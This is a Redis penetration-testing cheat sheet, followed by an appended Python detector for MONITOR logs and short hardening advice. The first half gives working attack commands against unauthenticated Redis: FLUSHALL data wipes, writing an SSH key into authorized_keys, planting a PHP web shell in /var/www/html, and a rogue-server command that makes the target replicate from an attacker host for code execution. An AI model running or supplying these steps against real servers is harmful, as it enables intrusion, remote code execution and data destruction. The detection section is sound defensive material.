Redis

Port 6379

  • By default Redis requires no authentication, so anyone who can reach port 6379 can run commands

#Basic Enum
INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]
config get dir

#Empty Database
FLUSHDB
FLUSHALL

Write Files > SSH Access

  • In the output of config get dir you can find the home directory of the redis user (usually /var/lib/redis or /home/redis/.ssh). Knowing this, you know where to write the authorized_keys file to get SSH access as the redis user. If you know the home directory of another valid user and have write permission there, you can abuse it the same way

#Generate RSA Key Pair
ssh-keygen -t rsa -C "crack@redis.io"

#Save as .txt with padding
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dbfilename "backup.rdb"
OK
192.168.1.11:6379> save
OK

redis-cli -h 192.168.1.11 flushall
cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

#Dump our memory content into the authorized_keys file
redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK

#SSH into host
ssh -i id_rsa antirez@192.168.1.11

Write Files > PHP Web Shell

  • Requires a web service running

config set dir /var/www/html
config set dbfilename sys.php
set test "<?php system($_REQUEST['cmd']); ?>"
#set test "<?php phpinfo(); ?>"
save
#BGSAVE

Rogue Server Sync Code Exec

python3 redis-rogue-server_5.py --rhost <Target> --rport 6379 --lhost 172.17.0.1 --lport 6381
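From the defender's side, every technique on this page leaves a recognisable command sequence: CONFIG SET dir / CONFIG SET dbfilename followed by SAVE or BGSAVE (the SSH key and PHP shell writes above), SLAVEOF/REPLICAOF to an unexpected host (the rogue server sync), and FLUSHALL. The following detector is an added example, not part of the original page; it parses MONITOR-style output (the sample lines are constructed, and /var/lib/redis is assumed to be the instance's legitimate persistence directory) and flags those sequences.

```python
import re

# Constructed MONITOR output (not from the page): the command sequences the
# RDB file-write and rogue-replica techniques above would leave behind, plus
# one benign command to show it raises no alert.
SAMPLE_MONITOR = """\
1700000001.200300 [0 10.0.0.5:51000] "flushall"
1700000002.400500 [0 10.0.0.5:51000] "config" "set" "dir" "/var/lib/redis/.ssh/"
1700000002.500600 [0 10.0.0.5:51000] "config" "set" "dbfilename" "authorized_keys"
1700000002.600700 [0 10.0.0.5:51000] "save"
1700000003.700800 [0 10.0.0.5:51001] "CONFIG" "SET" "dir" "/var/www/html"
1700000003.800900 [0 10.0.0.5:51001] "CONFIG" "SET" "dbfilename" "sys.php"
1700000003.900100 [0 10.0.0.5:51001] "BGSAVE"
1700000004.000200 [0 10.0.0.5:51002] "SLAVEOF" "172.17.0.1" "6381"
1700000005.000300 [0 127.0.0.1:40000] "GET" "session:42"
"""

# MONITOR line: <unix-ts> [<db> <client>] "cmd" "arg" ... (args are quoted with backslash escapes)
LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
SAFE_DIRS = {"/var/lib/redis"}  # this instance's legitimate persistence dir (assumption)

def parse_monitor(text):
    """Yield (timestamp, client, [cmd, args...]) tuples, skipping unparsable lines."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield float(m["ts"]), m["client"], ARG_RE.findall(m["rest"])

def detect(text):
    """Return alert strings for the abuse patterns this page describes."""
    alerts, pending = [], {}  # pending: client -> redirected dir/dbfilename not yet dumped
    for _ts, client, args in parse_monitor(text):
        cmd = args[0].lower() if args else ""
        state = pending.setdefault(client, {})
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set":
            key, val = args[2].lower(), args[3].rstrip("/")
            if key == "dir" and val not in SAFE_DIRS:
                state["dir"] = val           # dump directory moved off the data dir
            elif key == "dbfilename" and not val.endswith(".rdb"):
                state["dbfilename"] = val    # dump renamed to a non-RDB file
        elif cmd in ("save", "bgsave") and state:
            path = f"{state.get('dir', '<default>')}/{state.get('dbfilename', '<default>')}"
            alerts.append(f"{client}: RDB dump written to {path} after CONFIG SET")
        elif cmd in ("slaveof", "replicaof") and len(args) >= 3 and args[1].lower() != "no":
            alerts.append(f"{client}: replication redirected to {args[1]}:{args[2]}")
        elif cmd in ("flushall", "flushdb"):
            alerts.append(f"{client}: data wiped with {cmd.upper()}")
    return alerts
```

Detection is the fallback; setting requirepass, binding to a non-public interface and disabling CONFIG with rename-command prevents the sequence from happening at all.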
